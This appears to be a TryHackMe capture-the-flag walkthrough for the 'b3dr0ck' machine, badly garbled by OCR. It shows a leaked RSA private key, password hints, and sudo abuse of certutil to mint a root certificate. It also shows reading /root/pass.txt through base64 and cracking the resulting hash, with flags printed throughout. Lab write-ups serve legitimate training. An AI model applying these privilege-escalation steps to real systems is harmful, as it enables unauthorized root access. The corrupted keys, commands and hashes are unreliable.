tryhackme

View on GitHub

b3dr0ck

Tuesday, September 27, 2022 11:08 PM

kali S kali)- 1ø.1ø.234.2ø 9009 What are you looking for? help Looks like the secure login service Try connecting using: socat stdio SSI 1 What are you looking for? is running on port: 54321

What are you looking for? cert Sounds like you forgot your certificate. Let's find it for you ... BEGIN CERTIFICATE MllCoTCCAYkCAgTSMAØGCSqGS1b3DQEBCwUAMBQxEjAQBgNVBAMMCWxvY2 FsaG9z dDAeFWØYMjA5MjCXNZQ2MTBaFWØYMZA5MjCXNZQ2MTBaMBgXFjAoagNVBAMMDlJJh cm51esBSdWJ J tNhcT8XJBB/mKXui3d E8aipUNefdISeuØ1ebyoisxE2mqWR1 KB+gW97 fQLeT90QZ vBHhbPIRGyø4pcmN02JE4h4TeøaE9YE1pux5QOJzqaMoz04øyhiL1wp36d+dj1B1 6GpRqx5s7nBgSZ70dfbiRGvaR9NKm2a8JJhgfMki6ArP3pdhhSKZm3MqTbAyksOZ W8Kd1HmNAGMwXk1czvj4jPB1m20bBmYAaøHunW17LhV4peNgKx5wikgt2LlN0fxjN DZtKNsX7X5hTJkKb9CMQ9/1gkQ7CN6/aRfyxdMRmk19u+k/m1xid+hLz4M1gxxxG ZPPS7EnuTsce9dndAgMBAAEwDQYJKOZ1hVCNAQELBQADggEBAICy8GPCbGBjFOZG BQVCVC3CVkmijNDrbZ8twm10YLsshgØXULHgx/rgw706aFYDS6XhLcqJONCAznHT Kt0dRaodPPjlu//LLPkHrmIGOBM/b5WUxMøqzWha6jl 5MyEbW5AWbLWFWG8mYTaw C4fx111S8C9sqm/XlJIObrS1bY/VVN3XBuT3a1ZAPBmyhJqwnYBi7KIKDJIAG+qKr JXB3801bOivgT939UH1jNZR35W08mTYRøXGynGeCXD75KrUKUNACZk02+f1bAßlZA fxBmEA6eGtØH7GOp22txnWxXE9kzKTJDpigpJD06N2ZXV4421GDLUGP9U8FTuAdA UVJdj1s= END CERTIFICATE

What are you looking for? key Sounds like you forgot your private key. Let's find it for you BEGIN RSA PRIVATE KEY MllEPAIBAAKCAQEAVPJuybTYXE/FYQQf5i170t3RPGoqVDxn3ZUnrtNXlT18q1rMRN pq1kdsgf0Fve30C3k/aEGbwR4wz9URst0KQpjdNiR01eE3tGhPWBJavmeUDiwamj KM60NMoY fnY5QZehqUaseb05wYEme9HX24kRr2kfTSptmvCSYYHzJIugK Z96XYYUimZtZKk2WMpLDmvvcnZR5jQBjMF5CHMIY+1ZWSJtjmwzmAAdB7p1tey4V eKXjYCsec1p1LdrjaH8YzQ2bSjbF+1+YUyZCm/QjEPf5YJEOwjev2kX8sXTEZpCP bVPP5iMynf0S8+DJYMVIXS6T70XJ7kØgnVXZ3QIDAQABA01BAQCNafØVJi8Q1/u1 +1JponxmTyeTCDMt1f3rsuqgcptbZGpq2163iYMF5FfC1u1zSRsofEE/Kwwre782g GHD+BY+8QEs6Nuo/tn1PLRfdrxvPX1qMhPRCpGW2iNNaRjX1jbr5VvxBaX05cBMz gDnHNxKq8Gc47fcyzDMNkcWQzutMu07FsDnX/cWX+9jj1c/hqcN6gz9/dC8jhty wzXQYEDtUq1HQEHqRfKdDk+xxLISE1/dQyLm4rZOk6BGFØTbtbBogcDICNphØTIO 7zd6wQtna03q4fajcjE3Wh7navcehzycs15Qi8SB6LYZ2KGh8wmLIHwGK8j72cnT7 YVPSMyiZAOGBAOdKWU1e4+vai8MQg5WP1aUN4mtPhf7+01ZDT9EYB9LBIJNOe6Nn EFI IEJLqdJfUE71dzmaqVVBOv6Q3gs0Avy4Ay3EOALcWKCde8Pre8Xtr6mxg6HH8 UL7/3Lkpu7V9VLPNVWfnXVYIHICW4AFEtfY1dQmvjjRZHTØkMRPRbiNPAOGBANEi BG9BØi6aUdLXBvYduRVM2YTØLINnZ5nQS1dJM3MIKAeimk1vAQpiDAMØXRwzab31 eKaEjJFZd1CMXJozf7T54QjNj8ErN8hPtse1SYIBMDaYJiFe1V7twrDeuv2ZFbZS 5vbJIWDq91rMOY3itU/2SW5FeTXLSHE/sh1Y8FUTAOGBAJhtzr4SHftLU/etC+YZ R3A/28ZIWYcQoLCYiIkAfCMkUBrXhaO/Dwi4DNmg3j4EIRLsekkvRpNpr+BWKztE mLOJF0NhhJseYErAxeum5106wvyaTE5+v/15VUfL9cC52g//UJzr15Yr3df5fj+X t1WBXMKLCBOLF2 FMhB5Tae2yiBøtuNWLr7P24auL/e EBnaIi4ZWo rlJ6A2 KP5vDZq5gEh7 AkieUøA6sEbLhhgMVVjn7KL5Yb+6viY110t7rTQZYT10Hc018WYIAt869Ri770d5 7Kkc778cgYAj/BSØskJn12Ds5pMxj07Vusw1yBLqtYGeOEFF3hD7LvU3HSwBSzEØ

socat stdio [ —/Desktop/ctf/tryhackme/b3drøck. v7 ] SSI : 10.10.234.20 : 54321 , cert-cert , key-key , verify=ø Il_l Welcome: 'Barney Rubble' b3drøck> Is is authorized. Unrecognized command: 'Is' This service is for login and password b3drøck> help hints Password hint: dlad7cøa38Ø5955a35eb26Ødab418Ødd (user = 'Barney Rubble' ) b3drøck>

ssh barneymø.1ø.234.2ø barneyö1ø.1ø.234.20's password: Is barney. txt cat barney. txt THM{f05780f08føeb1de65023069døe4c90c 1 barneyOb3drøck : —$

barney6)b3drøck : / sudo -l [sudo] password for barney: Matching Defaults entries for barney on b3drøck: insults, env_reset, mail_badpass, User barney may run the following commands on b3drøck: (ALL . ALL) /usr/bin/certutil

barneyöb3drøck : /$ 21:54 04 17 :46 /usr/bin/certutil Is (/usr/share/abc/certs) Current Cert total 56 drwxrwxr-x 2 drwxrwxr-x 8 1 1 1 1 1 1 1 1 List: root root root root root root root root root root root root root root root root root root root root 4096 4096 972 1678 894 1674 976 1678 898 1674 Apr Apr Sep Sep Sep Sep Sep sep Sep Sep 30 29 27 27 27 27 27 27 27 27 17. • 46 17. •46 17 : 46 17. •46 • 46 17. 17. • 46 17. •46 barney. certificate . pem barney. clientKey. pem barney .csr. pem barney. serviceKey. pem fred . certificate. pem fred . clientKey. pem fred .csr . pem fred . serviceKey. pem

0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 卞 • 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 구 十 十 十 十 十 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 0 0 十 0 0 0 十 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 0 0 0 0 0 0 0 0 :gggg 0 0 十 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2+8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 0 0 0 0 0 0 0 0 0 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 十 0 0 0 0 0 0 0 0 0 十 十 十 十 十 0 0 0 0 0 十 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 十 十 十 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 十 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 十 十 十 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0

10000000000000000000+: 10000000000000000000000++ 1000000000000000000000000000++. ... . : +000000000000000 : . : +0000000000000000000 1000000000000000000000000000000000+ • 1000000000000000000000000000000000000000000000000000000000000000000000 • :: +0000000000000000000000 . +000000000000000000000000000 upposed to do with red Fred Fllntstonel Cert Tool Usage: Show current certs: certutil Is Generate new keypair: certutil [username] [fullname]

barney6)b3drøck : / $ /usr/bin/certutil Fred Flintstone node: internal/fs/utils:345 throw err; Error: at at at at at at at at at at EACCES: permission denied, open '/usr/share/abc/certs/server. serviceKey .pem' Object. openSync (node:fs:585:3) Object.readFilesync (node: f s: 453 : 35) generateCredentials (/usr/share/abc/dist/certs.js:1:3060) Module. _ compile (node: internal/modules/cjs/loader:1105:14) Object.Module._extensions js (node: internal/modules/cjs/loader:1159:1Ø) Module. load (node: internal/modules/cjs/loader:981:32) Function . Module. _ load (node: internal/ modules/cjs/loader:822:12) Module. require (node: internal/modules/cjs/loader:1Ø05:19) require (node: internal/modules/cjs/helpers:102:18) errno. 13 syscall: 'open', code: ' EACCES' , ' /usr/share/abc/certs/server. serviceKey. pem ' path:

barneyOb3drøck:/usr/share/abc/certs$ sudo -u root /usr/bin/certutil root ' Fred Flintstone' Generating credentials for user: root (Fred Flintstone) Generated: clientKey for root: /usr/share/abc/certs/root.clientKey.pem Generated: certificate for root: /usr/share/abc/certs/root .certificate.pem BEGIN RSA PRIVATE KEY MllEOWIBAAKCAQEA6D01YEQYCYCUØxaCSYCCQAo/XVFACP6abpoimRvd1kDY3LlD/ JLJL5ESOOFGdBk8HfMPGqC+XXiN+uNVZZtPEjzhYIJgØLLZ+B+m8SLH6QUIØE+WCY +htB3fEgidu5pY9Ks5BL 78BF1zgZToDxprHrIxMsdrLMOgØVOFSz3BCtmq/K7WvB 13DAyiFgXQMhr6B+4hAG03+zeWY2C1cøx39H/61+61D74D3gQOb1Kwb1cwwnfgoP tHDfKxBmFbNcgmuxiMkrrrfr+5mPr8QdNtDIMTxMvvabz0SICQlQlyVpcnEN+2Xe tutEdUZ2Piyg1rjikiJNXA6dCGguX25V49S8fQIDAQABA01BADhm5C+5 EpmkSQHE JqTVEU5a7t9M8B//McxzfLny1dxwdHIW68NXWKaJr5fXKP+qFPwkk+HJD5yosJmc u41Ø1d1b7ciLX169cwYQ4QSBXY45wt 7xwzdNTaeKfzve6m5DqyKIX1k60/Y2HLeL 7KbQcujMeH1wmtjY+pePQ40N5AIXdXDhUzeRLETxn/g2dwtc5N+L/pZLBVkF80K3 FrkKwb1RikbydM74zy/NUbAQDHHv9FQfuvoqøj8Quf3DLNk3ZEMjWC40BaA+YSiL jzatZitX+xuFvvJduEUMsq8qr61JIYMi6jø4QqzyeVks1rMtsY/QKCU+7kmK1bvcx 65baDiUcgYEA/ZQYYP9DJWUV6pwZBY8mOUUzSXuoreOj+E5qqXØcpZpnRICFg7dr pmn1rSXFCVOCDDSXAnYh79SXVZYSWDU//wa17XZAAKi1KkkUW7QW2BCQSQLl+KUYD

kali@ kali )- [—/Desktop/ctf/tryhackme/b3drøck. v7 c$ soc-at stdio Ill I _ I I Cl I SSI: 10.10.234.20:54321, cert=root _cert , , verify=ø I I/T\I I Welcome: 'Fred Flintstone' is authorized. help b3drøck> Password b3drøck> hint: YabbaDabbaDøøøø! (user = ' Fred Flintstone') abbaDabb

su root password : su: Authentication failure su fred Password : fredöb3drøck:/usr/share/abc/certs$ cd fredöb3drøck:-$ cat fred . txt THM{ø8da34e619da839b154521da7323559d} sudo -l Matching Defaults entries for fred on b3drock: insults, env_reset, mail_badpass, User fred may run the following commands on b3drøck: (ALL : ALL) NOPASSWD: /usr/bin/base32 /root/pass.txt (ALL : ALL) NOPASSWD: /usr/bin/base64 /root/pass. txt 1 fredöb3drøck : —$

sudo -u root /usr/bin/base64 /root/pass . txt TEZLRUMIMIPLUkNYU1dLWE1aVIUØMØtKRØ5NWFVSSINMR1dWUZUYTIBKQVhVVEXOSkPWVTJSQ1dO QkdYVVJUTEpaSØZTU11 fredöb3drOck : —$

Recipe From Base64 AlpnaDet Remove non-alphabet chars From Base32 Alohabet A-Z2-72 Remove non-alphabet chars From Base64 Alphabet Remove non-alphabet chars Strict mode Strict mode Last build: 11 days ago Input TEZLRUMIM1pLUkNYU1dLWE1aVIUOM@tKR05NWFvss1NMR1dWUzUyT18KQVhVVExoskpWTJSQ1do QkdYWJUTEpaseZTU11LCg= Output aßoa12aad6b7c16bfe7ß32bde5a31d56

up to 20 aeoa12aad6b7c16bf07ß32bde5a31d56 rm not a robot Crack Hashes supxrts: LM. NTLM. md4. mts. rods-half. shal- sha224. sham sh084. st•a512- MS-SQL 4.1+ Q&sV3.1aackupDe'auts Result

fredöb3drøck:-$ su root Password : cat /root/root. txt THM{de4043cø09214b56279982bf1øa661b7} 1 rootä)b3drøck: /home/fred#